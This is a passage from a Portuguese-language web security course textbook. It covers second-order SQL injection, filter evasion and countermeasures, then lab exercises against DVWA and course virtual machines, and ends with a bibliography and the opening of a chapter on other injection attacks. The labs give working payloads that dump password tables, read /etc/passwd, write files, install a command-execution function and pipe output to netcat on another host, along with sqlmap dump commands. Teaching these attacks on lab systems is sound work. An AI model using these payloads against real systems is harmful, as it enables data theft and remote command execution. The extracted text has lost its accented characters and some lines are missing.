(xp_cmdshell must be available)
a - All of the above
h - Print this menu
q - exit
> 0
[+] Checking SQL Server version...
Target: Microsoft SQL Server 2000
> 1
[+] Checking whether we are sysadmin...
No, we are not sa.... :/
[+] Finding dbuser length...
Got it ! Length = 3
[+] Now going for the characters........

DB User is....: esr
> 2 Figura 6.55

Extrao de infor-
[+] Checking whether user is member of sysadmin server role.... maes sobre o
banco de dados,
You are an administrator ! usando a ferramen-
ta Sqlninja, com
> q tcnica de injeo
de SQL s cegas.
294
Ataque de injeo de SQL
Como possvel executar um ataque de injeo de SQL quando a aplicao no exibe o
resultado da consulta?
Injeo de SQL de segunda ordem

Injeo de SQL de segunda ordem, tambm chamada de injeo de SQL armazenada, q
difere das tcnicas que vimos at aqui, porque a explorao no acontece no momento
da injeo, mas, sim, posteriormente, quando o valor injetado reutilizado pela aplicao.
Por consequncia, o ponto de injeo se localiza em um comando INSERT, em vez de um
SELECT, e no causa nenhum efeito imediato, devido a filtros instalados na aplicao.
O problema somente surge porque o valor persistido utilizado em ocasio ulterior, sem
a sanitizao necessria. Considere uma aplicao que permite aos usurios registrarem
novas contas, e que um filtro est instalado nas telas de autenticao e de cadastro, de
modo a duplicar toda aspa encontrada no identificador de usurio (Anley, 2002a). O objetivo
disso, segundo o inocente desenvolvedor, evitar ataques de injeo de SQL, iniciados com
aspa simples, e, ao mesmo tempo, permitir que sejam utilizadas contas para nomes, como
OReilly e OConnor.
Durante a criao de uma nova conta, o seguinte comando executado:
insert into users values(.str_replace(, , $userid).,
.$senha.)
Tal que $userid e $senha so variveis contendo valores fornecidos pelo usurio na tela de
cadastro. Imagine que o usurio entre, respectivamente, com os textos admin-- e senha.
Isso faz com que o seguinte comando seja executado:
insert into users values(admin--, senha)
O qual cria uma conta com identificador exatamente igual ao valor escolhido pelo usurio,
uma vez que o servidor de banco de dados interpreta as aspas duplicadas como uma s.
A aplicao em foco permite que usurios autenticados troquem a senha da prpria conta
sem terem de digitar a senha atual novamente. Alm disso, o identificador de usurio
empregado pelo comando UPDATE, que realiza a operao de troca, obtido a partir do
objeto de sesso e utilizado, sem ser tratado, como nas demais rotinas.
update users set password = .$senha. where id = .$userid.
Supondo que o usurio admin-- esteja autenticado e realize a troca de senha para o valor
dificil, o seguinte comando ser executado pelo servidor:
update users set password = dificil where id = admin--
295
Note que, como a aspa no duplicada nesse processo, ela balanceia a aspa que delimita o
nome de usurio, enquanto o -- trata de comentar o restante da linha. O resultado dessa
injeo de segunda ordem resume-se na troca da senha da conta admin, se ela existir, sem
que seja necessrio conhecer a senha atual dela.
Ferramentas automatizadas apresentam uma enorme dificuldade para encontrar esse tipo
de vulnerabilidade, conforme pode ser constatado pelo estudo de Doup et al. (2010). Mesmo
testes manuais podem enfrentar obstculos na localizao do defeito porque, na maioria das
vezes, difcil disparar o vetor injetado, principalmente, quando o processo ocorre s cegas.
Apesar de reconhecer o trabalho que descobrir injees de SQL de segunda ordem, Clarke
(2009) prope um mtodo, para realizar a tarefa, que consiste nos seguintes passos:
1. Durante a fase de mapeamento da aplicao, identifique todos os dados que podem ser
controlados pelo usurio e que so armazenados no banco de dados.
2. Para cada um deles, fornea um valor, como aspa simples, por exemplo, que possa causar
um problema se utilizado em um comando SQL.
3. Navegue por toda a aplicao, visitando lugares em que o valor possa ser usado explcita
ou implicitamente, e observe se algum comportamento anmalo pode ser detectado.
4. Para cada potencial problema encontrado, tente criar uma prova de conceito que possa
ser usada para comprovar a vulnerabilidade.
Evaso de filtros
Algumas aplicaes utilizam filtros para bloquear entradas maliciosas ou para alter-las, q
de modo que no possam ser utilizadas em ataques. Muitas vezes, eles no so empre-
gados com o propsito de propiciar defesa em camadas, mas, sim, de contornar vulne-
rabilidades presentes na aplicao (Clarke, 2009). Nesses casos, se o atacante consegue
evadir os filtros instalados, o sistema pode ser explorado, normalmente.
Historicamente, no so raras as ocorrncias de filtros dessa natureza contendo vulnerabili-

dades (Stuttard e Pinto, 2007).
Nos exemplos abaixo, observe as tcnicas de evaso que podem ser empregadas em cada
um dos casos:
1 Bloqueio de espaos: dependendo da implementao, pode ser quebrado por meio da

substituio de espaos por comentrios de meio de comando. Exemplo:
select/**/username/**/from/**/v$session
1 Bloqueio de palavras utilizadas em SQL: desde que escritas em maisculas ou mins-

culas possvel fornecer valores com alternncia de letras maisculas e minsculas.
Exemplo:
sElEcT @@version
1 Remoo, em uma nica passagem, das palavras utilizadas em SQL que estejam
contidas nos dados fornecidos pelo usurio: a quebra desse filtro pode ser realizada
por meio da escrita aninhada das palavras, que so consideradas pelo controle.
Exemplo:
selselectect @@version
296
1 Bloqueio de aspas: a soluo, nesse caso, consiste em utilizar concatenao de carac-
teres, conforme sintaxe do SGBD empregado. Exemplo:
select concat(char(65),char(66),char(67))
1 Bloqueio de palavras e caracteres diversos: uma tcnica de evaso, que funciona

muitas vezes, consiste em aplicar codificao de URL ao valor do parmetro injetado. Por
exemplo, union select 1,null,null from dual-- fica:
%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%6e%75%6c%6c%2
c%6e%75%6c%6c%20%66%72%6f%6d%20%64%75%61%6c%2d%2d
1 Filtros externos, escritos em C ou C++: cadeias de caracteres, nessas linguagens, so

finalizadas com um byte zero. Assim, uma estratgia de evaso consiste em inserir um
byte nulo, codificado como %00, no comeo do valor injetado (Clarke, 2009).
Exemplo:
%00 union select @@version--
Contramedidas
Para evitar que aplicaes web sejam vulnerveis a ataques de injeo de SQL, os q
seguintes controles devem ser adotados nos processos de desenvolvimento e de implan-
tao (Howard et al., 2005; Clarke, 2009; Stuttard e Pinto, 2007):
process-la, verifique se ela est de acordo com valores reconhecidamente vlidos para
o campo ou parmetro. importante mencionar que essa abordagem superior ao uso
de listas negras, pois, dificilmente, possvel enumerar todas as entradas perniciosas
possveis. Complementarmente, restrinja o tamanho do campo ao mximo permitido.
1 Se aspas forem permitidas em campos textuais, duplique-as sempre antes de utiliz-las

em comandos SQL.
1 No submeta consultas ao banco de dados que sejam resultantes da concatenao

do comando a ser executado com valores fornecidos por usurios.
1 Utilize apenas comandos preparados (prepared statements), os quais so pr-compilados e

no permitem que a semntica seja alterada depois disso. Desse modo, qualquer comando
fornecido por um usurio malicioso, como parte da entrada, ser interpretado como um
parmetro da consulta pelo SGBD.
1 Realize o acesso camada de dados, por meio de procedimentos definidos no banco

de dados, encapsulando, assim, a estrutura das tabelas que compem a aplicao.
1 Capture todos os erros de execuo e fornea apenas mensagens tratadas aos usu-
rios, isto , no exiba erros contendo comandos SQL, pilhas de execuo e cdigos
especficos de plataforma.
1 Utilize na aplicao uma conta para acesso ao banco de dados com os mnimos
privilgios necessrios execuo das tarefas. Nunca use contas com privilgios Data
DDL Definition Language (DDL) e, muito menos, contas administrativas. Se isso no for
Compreende o respeitado, a extenso do dano, em caso de ataque bem-sucedido, poder ser muito
subconjunto de
maior, uma vez que o atacante ser capaz de remover, incluir e alterar objetos estru-
comandos SQL,
utilizados na criao, turais, como tabelas e ndices, por exemplo.
alterao e remoo
de objetos de um
banco de dados.
297
1 Realize o robustecimento do servidor de banco de dados eliminando objetos, usu- q
rios e privilgios desnecessrios. Por exemplo, em verses mais antigas de Oracle,
muitos pacotes vinham com privilgio de execuo concedido para PUBLIC por
padro, isto , podiam ser acessados por qualquer conta do banco. Assim como no
item acima, a ideia desse controle diminuir a extenso do dano, caso as linhas de
defesa falhem, sempre pensando em defesa em camadas.
1 Instale um filtro de pacotes no servidor de banco de dados e o configure para permitir

apenas os trfegos de entrada e sada vlidos.
Stored procedures
Muitos afirmam que a soluo contra injeo de SQL consiste no uso de stored procedures.
Isso verdade?
298
Atividade 1 Especificidades de SGBDs
Esta atividade tem por objetivo ilustrar as diferenas apresentadas por alguns sistemas
gerenciadores de banco de dados. Para inici-la, carregue as mquinas virtuais do aluno e
do servidor (Fedora) e execute os roteiros na primeira delas.
Empilhamento de comandos
O foco desta atividade verificar o suporte a comandos empilhados.
2. Conecte-se ao servidor Fedora e digite esruser como senha:
~$ ssh esruser@192.168.213.200
3. Conecte-se ao MySQL, utilizando a conta root:
~$ mysql --user=root mysql
4. Execute os seguintes comandos empilhados e veja se algum problema ocorre:
mysql> select @@version;select @@version;
5. Abra uma segunda janela de terminal.
6. Conecte-se ao servidor Fedora e digite esruser como senha:
~$ ssh esruser@192.168.213.200
7. Conecte-se ao PostgreSQL, utilizando a conta postgres, e, quando solicitada, fornea a

senha postgres:
~$ psql postgres postgres
8. Execute os seguintes comandos empilhados e veja se algum problema ocorre:
postgres=# select version();select version();
Comando de pausa
Neste exerccio, sero estudados os comandos de pausa fornecidos pelos SGBDs.
1. No terminal de acesso ao MySQL, digite o comando abaixo e veja o que acontece:

mysql> select sleep(5);
2. Invoque a funo de avaliao de desempenho:
mysql> select benchmark(5000000,sha1(Teste));
3. Mude para o terminal de acesso ao PostgreSQL e digite:
postgres=# select pg_sleep(5);
299
Manipulao de caracteres e de cadeias de caracteres
O objetivo dessa prtica utilizar as funes e os operadores de manipulao de cadeias
de caracteres.
1. No terminal de acesso ao MySQL, realize a concatenao de cadeias de caracteres:
mysql> select a b, concat(a,b);
2. Extraia uma parte do texto escola de redes:
mysql> select substr(escola de redes,1,6);
3. Verifique o tamanho do texto escola de redes:
mysql> select length(escola de redes);
4. Descubra o cdigo ASCII do caractere A e o caractere correspondente ao ASCII 112:
mysql> select ascii(A),char(112);
5. Alterne para o terminal de acesso ao PostgreSQL e utilize o operador de concatenao:
postgres=# select a||bc;
6. Encerre as janelas de terminal.

a descoberta de vulnerabilidades, explorveis por meio de injeo de SQL. Todos os exerc-
cios devem ser realizados na mquina virtual do aluno e altamente recomendado que se
tente traar a estratgia de explorao antes de seguir o roteiro fornecido. Alguns arquivos
de apoio esto contidos no diretrio /home/esruser/Arquivos do Curso/sessao-09. Por fim,
sempre que a injeo conduzir outra pgina da aplicao, aps analisado o resultado,
retorne pgina anterior, pressionando Alt + Seta esquerda.
Testes bsicos
Este exerccio e a maioria dos que seguem neste captulo sero realizados sobre a aplicao
DVWA, criada para permitir que desenvolvedores, profissionais de segurana e estudantes
aprendam sobre as vulnerabilidades que podem afetar aplicaes web. Este primeiro roteiro
engloba os testes bsicos de injeo de SQL.

3. Autentique-se, fornecendo as credenciais admin/password.
4. No menu presente do lado esquerdo, clique em SQL Injection.
5. Digite uma aspa simples no campo User ID e clique em Submit. O que acontece? Alguma
informao interessante para um teste de invaso exibida?
6. Digite or 1=1 no campo User ID e clique em Submit. O que aparece?
300
7. Digite or 1=1-- no campo User ID e clique em Submit. Por que o erro acontece?
8. Corrija a entrada para or 1=1# e repita o processo.
Extrao de dados via UNION

Este exerccio tem por finalidade introduzir a tcnica de extrao de dados baseada no
operador UNION, alm dos mtodos para determinao do nmero de colunas e dos
respectivos tipos.
Determinao do nmero de colunas
9. Na aplicao DVWA, na mesma pgina, digite o vetor abaixo e clique em Submit:
union select null#
O erro indica que h mais de uma coluna na tabela.
10. Realize o teste com duas colunas:
union select null,null#
Observe que a requisio foi executada com sucesso, o que indica que a consulta realizada
possui duas colunas.
11. Faa o teste com a tcnica baseada na clusula ORDER BY:
order by 1#
Conforme esperado, nenhum erro acontece, uma vez que h duas colunas.
12. Repita o teste para duas colunas e verifique se algum erro acontece:
order by 2#
13. Execute o mesmo teste para trs colunas e diga se o que acontece coerente com o esperado:
order by 3#
Determinao dos tipos das colunas
1. Submeta o seguinte texto para testar o tipo da primeira coluna:
union select abc,null#

A ausncia de erro, decorrente da requisio, implica que a primeira coluna textual.
2. Repita o processo para a segunda coluna, fornecendo:
union select null, abc#
possvel afirmar que o tipo da segunda coluna tambm textual?
301
Identificao do servidor de banco de dados
Apesar de j se saber o servidor de banco de dados utilizado, graas s mensagens de erro
e ao tipo de comentrio utilizado, neste exerccio o leitor ratificar a informao e coletar
outras mais acerca do banco de dados.
1. Na aplicao DVWA, na mesma pgina, digite o texto abaixo, para descobrir a verso, e
clique em Submit:
union select @@version,null#
2. Verifique a conta que a aplicao utiliza para acessar o banco de dados, fornecendo:
union select current_user(),null#
3. Descubra o nome do banco de dados empregado pela aplicao, digitando:
union select database(),null#
4. Repita o processo utilizando o sqlmap. Para isso, inicie uma janela de terminal.
5. Digite o seguinte comando e verifique as opes disponveis:
~$ sqlmap.py -h
6. Como a pgina vulnervel do DVWA s acessvel por uma sesso autenticada, necessrio
obter o cookie definido pela aplicao. No Firefox, no menu Tools, selecione Cookie Editor.
7. Aumente a janela e clique individualmente nos cookies PHPSESSID e security, copiando o

valor de cada um deles.
8. Clique em Close para encerrar o complemento Add N Edit Cookies.
9. Copie a URL inteira presente na barra de endereos do Firefox.
10. A partir da URL e dos cookies coletados, monte um comando semelhante ao abaixo apre-
sentado, para identificar o banco de dados utilizado:
~$ sqlmap.py -u http://dvwa.esr.rnp.br/vulnerabilities/sqli/? 8
id=a&Submit=Submit#" --cookie="PHPSESSID=v9aqm8gvkljvpqiuavkaa1
sc24;8
security=low" -f
11. Pressione Enter para a pergunta GET parameter id is vulnerable. Do you want to keep testing
the others? [y/N].
12. O SGBD foi corretamente identificado?

13. Repita o passo 10, substituindo a opo -f por -b, para captura do banner do SGBD:
id=a&Submit=Submit#" --cookie="PHPSESSID=v9aqm8gvkljvpqiuavkaa1sc24;8
security=low" -b
302
14. Para descobrir o usurio corrente, troque a opo -b por --current-user:
sc24;8
security=low" --current-user
15. Finalmente, substitua a opo --current-user por --current-db para identificar o banco de
dados utilizado pela aplicao:
sc24;8
security=low" --current-db
Escalada de privilgios
A proposta deste exerccio conseguir acesso mais privilegiado que o proporcionado pela
conta utilizada pela aplicao. Para isso, um ataque de dicionrio contra a conta administra-
tiva do PostgreSQL ser efetuado.
1. Abra uma nova janela do Firefox, pressionando Ctrl + N.
2. Acesse http://pgsqli.esr.rnp.br/escalada.php.
3. Digite uma aspa simples no campo Termos e clique em Buscar Artigos. A aplicao exibe
informaes sobre o banco de dados utilizado? Anote todas as informaes relevantes.
4. Com o campo Termos vazio, clique em Buscar Artigos. Correlacione os nomes de colunas
descobertos no passo 3 com as exibidas pela consulta e infira o tipo de cada uma delas.
5. Verifique a verso do PostgreSQL, o identificador da conta que a aplicao utiliza para

acessar o SGBD, e o prprio nome do banco de dados:
union select null,version(),user||:||current_database()--
6. Suponha que se saiba da existncia de uma tabela chamada books, cujas colunas so id,
author e title. Tente extrair o contedo dela por meio da tcnica UNION:
union select id,author,title from books--
A conta possui os privilgios necessrios para realizar a operao?
7. De modo a conseguir extrair informaes das tabelas do banco, dentre as quais a books,
necessrio escalar os privilgios da conta de acesso atual. Para isso, realize um ataque
de dicionrio contra a conta postgres, iniciando com a senha password:
password=password , select 1,\ a\ ,\ b\ ) returns (i int, j text, 8
k text)--
303
8. Repita o passo 7, com a senha postgres:
password=postgres , select 1,\ a\ ,\ b\ ) returns (i int, j text, 8
k text)--
9. Utilize o prprio dblink para extrair a tabela books, usando as credenciais administrativas:
union select * from dblink(dbname=pgsqli host=localhost 8
user=postgres password=postgres , select id,author,title from 8
books ) returns (i int, j text, k text)--
Note que necessrio especificar o nome do banco de dados, obtido no Passo 5.
Feche a janela atual do Firefox.
Descoberta e extrao de tabelas

Esta prtica visa familiarizar o leitor com as diversas tabelas e vises que compem o
dicionrio de dados do MySQL, e como elas podem ser empregadas para obter informaes
sobre os diversos objetos existentes nos bancos do servidor.
Parte I Extrao manual
1. Na aplicao DVWA, na pgina de Injeo de SQL, digite o vetor abaixo e clique em Submit
para descobrir as tabelas existentes nas bases gerenciadas pelo MySQL:
and 1=2 union select table_schema,table_name from 8
information_schema.tables where table_schema<> 8
information_schema order by 1#
2. Role a tela e veja as inmeras tabelas presentes nos diversos esquemas.
3. Descubra as colunas da tabela wackopicko.users:
and 1=2 union select column_name,data_type from 8
information_schema.columns where table_schema= wackopicko and 8
table_name= users #
4. Selecione todas as linhas da tabela wackopicko.users, incluindo no resultado as colunas

login, password e salt:
and 1=2 union select login,concat(password,:,salt) from 8
wackopicko.users#
5. Descubra as colunas da tabela owasp10.accounts:
and 1=2 union select column_name,data_type from 8
information_schema.columns where table_schema= owasp10 and 8
table_name= accounts #
304
6. Selecione todas as linhas da tabela owasp10.accounts, incluindo no resultado as colunas
username e password:
and 1=2 union select username,password from owasp10.accounts#
Parte II Extrao automatizada
Nesta parte do exerccio, o aluno aprender como extrair as mesmas tabelas com auxlio da
ferramenta sqlmap.
2. Como a pgina vulnervel do DVWA s acessvel por uma sesso autenticada, necessrio
obter o cookie definido pela aplicao. No Firefox, no menu Tools, selecione Cookie Editor.
3. Aumente a janela e clique individualmente nos cookies PHPSESSID e security, copiando o

valor de cada um deles.
4. Clique em Close para encerrar o complemento Add N Edit Cookies.
5. Copie a URL inteira presente na barra de endereos do Firefox.
6. A partir da URL e dos cookies coletados, monte um comando semelhante ao abaixo apre-
sentado para enumerar as tabelas existentes:
sc24;8
security=low" --tables
7. Descubra as colunas da tabela wackopicko.users:
sc24;8
security=low" --columns -D wackopicko -T users
8. Selecione todas as linhas da tabela wackopicko.users:
sc24;8
security=low" --dump -D wackopicko -T users
Responda Y para a pergunta Fetching entries for table users on database wackopicko
recognized possible password hash values. Do you want to use dictionary attack on retrieved
table items? [Y/n/q] e pressione Enter para as duas prximas perguntas.
9. Veja o arquivo CSV gerado pela ferramenta:
~$ cat /usr/share/sqlmap/output/dvwa.esr.rnp.br/dump/wackopicko/8
users.csv
305
10. Descubra as colunas da tabela owasp10.accounts:
sc24;8
security=low" --columns -D owasp10 -T accounts
11. Selecione todas as linhas da tabela owasp10.accounts:
sqlmap.py -u http://dvwa.esr.rnp.br/vulnerabilities/sqli/? 8
sc24;8
security=low" --dump -D owasp10 -T accounts
Manipulao de arquivos
Diversos ataques contra a aplicao e o prprio sistema gerenciador de bancos de dados
requerem a leitura e escrita de arquivos do sistema. Neste exerccio, o leitor aprender
como realizar essas tarefas explorando uma aplicao vulnervel baseada em MySQL.
Leitura de arquivos
para ler o arquivo /etc/passwd:
and 1=2 union select load_file(/etc/passwd),null#
2. Tente carregar, agora, o arquivo binrio /etc/mountpoint:
and 1=2 union select load_file(/bin/mountpoint),null#
fcil perceber que h diversos caracteres no imprimveis, como esperado.
3. Leia o arquivo novamente, mas codificando-o em caracteres hexadecimais:
and 1=2 union select hex(load_file(/bin/mountpoint)),null#
Escrita de arquivos
5. Conecte-se ao servidor Fedora, fornecendo a senha esruser:
~$ ssh esruser@192.168.213.200
6. Liste os arquivos presentes no diretrio /tmp:
~$ ls -l /tmp
para gravar os dados da tabela wackopicko.users no arquivo /tmp/users.txt:
and 1=2 union select login,password from wackopicko.users into 8
outfile /tmp/users.txt #
306
8. Retorne ao terminal e verifique que o arquivo foi criado:
~$ less /tmp/users.txt
9. Injete o seguinte texto no DVWA, na pgina de injeo de SQL, para criao de um arquivo
binrio contendo os bytes {0x30, 0x45, 0x10}:
and 1=2 union select 0x304510, into outfile /tmp/arq1.bin#
10. Na janela de terminal, verifique o tamanho do arquivo:
~$ ls -l /tmp/arq1.bin
Por que o arquivo gerado possui 5 bytes, em vez de 3? Qual foi o erro cometido?
11. Gere um novo arquivo, via injeo de SQL no DVWA, com mesmo contedo:
and 1=2 union select 0x304510, into dumpfile /tmp/arq2.bin#
12. Verifique o tamanho do arquivo /tmp/arq2.bin, na janela de terminal:
~$ ls -l /tmp/arq2.bin
Funo definida pelo usurio

Este exerccio tem por objetivo a criao de funes de usurio que permitam a execuo de
comandos no sistema operacional.
1. Acesse http://pgsqli.esr.rnp.br/index2.php, no Firefox.
2. Digite o valor abaixo no campo Termos e clique em Buscar Artigos:
;select replace(sys_eval(ls -l /),\n,<BR>)--
Que erro ocorre?
4. Acesse o diretrio /home/esruser/Arquivos\ do\ Curso/sessao-06/udf/postgresql/:
~$ cd /home/esruser/Arquivos\ do\ Curso/sessao-06/udf/postgresql/
5. Abra o arquivo vetores.txt:
~$ gedit vetores.txt &
6. Selecione inteiramente o vetor identificado como P1 e pressione Ctrl + C.

7. Retorne aplicao de busca de artigos, limpe o campo e cole o valor copiado, pressio-
nando Ctrl + V. Essa etapa cria uma tabela temporria no banco de dados.
8. No gedit, selecione inteiramente o vetor identificado como P2 e pressione Ctrl + C.
nando Ctrl + V. Essa etapa armazena, na tabela temporria, a representao em BASE64
da biblioteca a ser instalada.
307
nando Ctrl + V. Essa etapa cria um objeto do tipo large.
13. Retorne aplicao de busca de artigos, limpe o campo e cole o valor copiado, pres-
sionando Ctrl + V. Essa etapa atualiza a parte de dados do objeto recm-criado para o
contedo original da biblioteca.
nando Ctrl + V. Essa etapa grava a biblioteca no arquivo /tmp/lib_postgresqludf_sys.so.
nando Ctrl + V. Essa etapa cria quatro funes de usurio no PostgreSQL para execuo
de comandos e leitura de arquivos.
18. Repita o Passo 2 e veja o que acontece.
19. Encerre o gedit.
20. Para o prximo exerccio, mantenha a aplicao de consulta de artigos e o terminal abertos.
Execuo de comandos no sistema operacional

A prtica anterior j ilustrou como executar comandos do sistema operacional por meio de
injeo de SQL baseada em funo de usurio. Assim, o objetivo deste exerccio apenas
agregar mais alguns exemplos.
1. No terminal, digite o seguinte comando para escutar conexes na porta 10000:
~$ nc -l 10000
2. Injete o seguinte valor na aplicao de busca de artigos:
;select sys_eval(echo Teste | nc 192.168.213.10 10000)--
3. Retorne ao terminal e veja o que aconteceu.
4. Para descobrir o endereo de rede do servidor, injete o seguinte valor na aplicao de

busca de artigos:
;select replace(sys_eval(ifconfig),\n,<BR>)--
Varredura de redes
Neste exerccio, o aluno entender como realizar varredura da rede interna por meio de
injeo de SQL.
6. Injete o seguinte valor na aplicao de busca de artigos, para recuperar o endereo IP dos
servidores de aplicao e de banco de dados:
and 1=2 union select 1,host(inet_server_addr()), 8
host(inet_client_addr())--
308
O que indica o resultado devolvido pela aplicao?
7. Digite o valor abaixo no campo Termos e clique em Buscar Artigos, para verificar se a
mquina 192.168.213.10 est ativa e responsiva:
;select replace(sys_eval(ping -c 4 192.168.213.10),\n,<BR>)--
8. Digite o valor abaixo no campo Termos e clique em Buscar Artigos, para verificar se o
servio SSH est sendo executado na mquina 192.168.213.10:
; select 1,null,dblink_connect(host=192.168.213.10 port=22 8
connect_timeout=5 )--
A mensagem de erro exibida significa que o servio est ativo?
9. Injete o seguinte valor na aplicao de busca de artigos, para verificar se o Telnet est
ativo na mquina 192.168.213.10:
; select 1,null,dblink_connect(host=192.168.213.10 port=23 8
connect_timeout=5 )--
O que possvel concluir sobre o servio Telnet na mquina especificada?
Partio e balanceamento
Como vimos, a tcnica de partio e balanceamento importante, pois facilita o processo de
injeo de SQL em qualquer tipo de comando e na parte em que ocorre a vulnerabilidade.
Nesse contexto, o roteiro abaixo ilustra como aplicar esse mtodo.
1. Na aplicao de consulta de artigos, digite Advanced no campo Termos e clique em

Buscar Artigos.
2. Repita o processo com o texto Ad||vanced. Houve mudana no resultado?
3. Injete agora o seguinte vetor:
Ad||cast((select ) as char)||vanced
Observe que o SELECT acima pode ser substitudo por outros, como o abaixo mostrado:
Ad||(select pg_sleep(5))||vanced
O que faz essa injeo?
4. Encerre a janela do Firefox.
309
Injeo de SQL s cegas
Neste exerccio, o aluno aplicar a tcnica de injeo de SQL s cegas, manualmente e com
auxlio da ferramenta sqlmap.
Parte I Processo manual
2. Acesse http:// http://pgsqlbi.esr.rnp.br/.
3. Preencha o campo Autor com o valor abaixo e clique em Contar artigos para verificar se o
SGBD empregado o MySQL:
SGBD empregado o Oracle:
a || bitand(1,1) ||
SGBD empregado o PostgreSQL:
a || pg_sleep(5) ||
6. Preencha o campo Autor com uma aspa simples e clique em Contar artigos. A mensagem
de erro fornece informaes relevantes?
7. Digite a no campo Autor e clique em Contar artigos. Quantos artigos so encontrados?
8. Digite abc no campo Autor e clique em Contar artigos. Quantos artigos so encontrados?
9. Fornea a and 1=1-- para o campo Autor e clique em Contar artigos. Quantos artigos so
encontrados? Por que este resultado foi obtido?
10. Submeta agora o vetor a% and 1=1--. Quantos artigos so encontrados?
11. A partir dos resultados obtidos, possvel concluir que a submisso de um vetor, como o
abaixo, encontrar trs artigos, se e somente se, a <pergunta booleana> for verdadeira:
a% and <pergunta booleana>--
12. Com base no que foi levantado, descubra o nome da conta que utilizada pela aplicao
para conectar-se ao banco de dados, por meio da tcnica bit-a-bit. O seguinte vetor pode
ser injetado para descobrir o valor do bit 7:
a% and ascii(substr(user,1,1))&128=128--
13. Descubra o valor do bit 6:
310
14. Repita o processo para o bit 5:
15. Idem para o bit 4:
19. E, finalmente, o bit 0 testado:
20. Isso resulta na cadeia de bits 01110000, que 112 em decimal e o cdigo ASCII da letra p.
21. O processo pode continuar para cada uma das letras, porm, prossiga com o roteiro
baseado no sqlmap aps encerrar o Firefox.
Parte II Processo automatizado
23. Para executar o sqlmap contra o mesmo formulrio, digite o seguinte comando:
$ sqlmap.py -u pgsqlbi.esr.rnp.br --current-user --current-db 8
--form
24. Pressione Enter para a pergunta Do you want to test this form? [Y/n/q].
25. Pressione Enter para a mensagem Edit POST data [default: autor=&Submit1= Contar%20
artigos] (Warning: blank fields detected):.
26. Digite n e pressione Enter para a pergunta Do you want to fill blank fields with random
values? [Y/n].
27. Pressione Enter para a pergunta POST parameter autor is vulnerable. Do you want to keep
testing the others? [y/N].
28. Pressione Enter para a pergunta Do you want to exploit this SQL injection? [Y/n].
Injeo de SQL de segunda ordem

Este ltimo exerccio explora a injeo de SQL de segunda ordem em uma aplicao que
permite que o usurio crie a prpria conta.
2. Acesse http://2ndsql.esr.rnp.br/
311
3. Tente se autenticar com as credenciais admin/admin. O que implica a mensagem de
erro exibida?
4. Clique em Novo usurio.
5. Preencha os campos do formulrio, informando o identificador de usurio admin-- e a

senha que desejar.
6. Clique em Registrar. Note que nenhum erro ocorre, o que indica que a aplicao duplica as
aspas da entrada ou no utiliza concatenao para construir a consulta.
7. Autentique-se com a conta criada. Com que nome de usurio a saudao realizada?
8. Clique em Alterar senha.
9. Fornea, como nova senha, a palavra admin.
10. Clique em Alterar senha.
11. Repita o passo 3 e observe o que acontece.
13. Explique como o ataque funciona.

312
Bibliografia 6
1 ANLEY, Chris. Advanced SQL Injection in SQL Server Applications. NGSSoftware Insight
Security Research (NISR) Publication, Next Generation Security Software Ltd, 2002a.
1 ANLEY, Chris et al. Advanced SQL Injection. NGSSoftware Insight Security Research (NISR)
Publication, Next Generation Security Software Ltd, 2002b.
1 ANLEY, Chris. Hackproofing MySQL. NGSSoftware Insight Security Research (NISR)

Publication, Next Generation Security Software Ltd, 2004.
1 CLARKE, Justin. SQL Injection Attacks and Defense. Syngress, 2009.
1 DOUP, Adam; COVA, Marco e VIGNA, Giovanni. Why Johnny Cant Pentest: An Analysis
of Black-box Web Vulnerability Scanners. In: Proceedings of Detection of Intrusions and
Malware, and Vulnerability Assessment, 7th International Conference, DIMVA 2010.
Lecture Notes in Computer Science 6201, Springer, 2010.
1 GUIMARES, Bernardo Damele Assumpo. Advanced SQL Injection to operating system full
control. Black Hat Europe Briefinds, 2009.
1 GUIMARES, Bernardo Damele Assumpo e STAMPAR, Miroslav. SQL map users manual
version 0.9. Manual, 2011.
1 HALFOND, Willian G. J.; VIEGAS, Jeremy e ORSO, Alessandro. A Classification of SQL

Injection Attacks and Countermeasures. In: Proceedings of the International Symposium
on Secure Software Engineering, 2006.
1 HOWARD, Michael; LEBLANC, David e VIEGA, John. 19 Deadly Sins of Software Security -
1 KOST, Stephen. An Introduction to SQL Injection Attacks for Oracle Developers. Integrigy
Corporation, 2004.
1 LEIDECKER, Nico. Having Fun With PostgreSQL. Portcullis Computer Security Limited, 2007.
1 LITCHFIELD, David. Data-mining with SQL Injection and Inference. NGSSoftware Insight
Security Research (NISR) Publication, Next Generation Security Software Ltd, 2005.
1 LITCHFIELD, David; ANLEY, Chris; HEASMAN, John e GRINDLAY, Bill. The Database Hackers
Handbook: Defending Database Servers. Wiley Publishing, Inc., 2005.
1 LITCHFIELD, David. The Oracle Hackers Handbook - Hacking and Defending Oracle. Wiley
1 SPETT, Kevin. SQL Injection - Are your web applications vulnerable?, SPI Dynamics, 2002.
1 SPETT, Kevin. Blind SQL Injection - Are your web applications vulnerable?, SPI Dynamics, 2003.
313
314
7
Ataques de injeo
objetivos
Apresentar ataques de injeo menos conhecidos que o SQL e o XSS e as tcnicas

que podem ser empregadas para detectar se uma aplicao vulnervel a eles.
Injeo de comandos de sistema operacional, injeo em trilhas de auditoria, poluio
conceitos
de parmetros HTTP, injeo em filtros LDAP, injeo em filtros LDAP s cegas, injeo
de comandos SMTP, injeo de XPath, injeo de XPath s cegas, incluso de arquivos.
Introduo
Ataques de injeo podem ocorrer quando comandos que devem ser processados por q
um interpretador utilizado pela aplicao so construdos, em tempo de execuo, a
partir da concatenao de valores fornecidos por usurios, sem as validaes necessrias
para deteco de entradas maliciosas. Aproveitando-se de tal cenrio, um atacante pode
alterar a semntica original do que deveria ser executado pelo interpretador, por meio da
injeo de palavras-chave e de caracteres com sentido especial na linguagem empregada.
O cross-site scripting e a injeo de SQL, j abordados, respectivamente, nos Captulos 5 e 6

deste livro, podem ser citados como dois exemplos deste tipo de explorao. Observe-se
que, no primeiro caso, o interpretador alvo o navegador web, que processa HTML, lin-
guagens de scripts e afins, e, no segundo, o sistema gerenciador de bancos de dados, que
conversa em SQL, na grande maioria das vezes.
A extenso do dano causado por um ataque de injeo depende de diversos fatores, que q
incluem aspectos de configurao da prpria aplicao, das plataformas subjacentes e
da infraestrutura de rede que suporta o sistema.
Para exemplificar este fato, considerem-se, novamente, o ataque de injeo de SQL e os

Captulo 7 - Ataques de injeo
elementos que podem potencializar o resultado da explorao. Vimos que uma aplicao
que acessa o SGBD com conta administrativa permite que qualquer comando SQL seja
executado; que se a conta do sistema operacional, usada para executar o SGBD, tambm
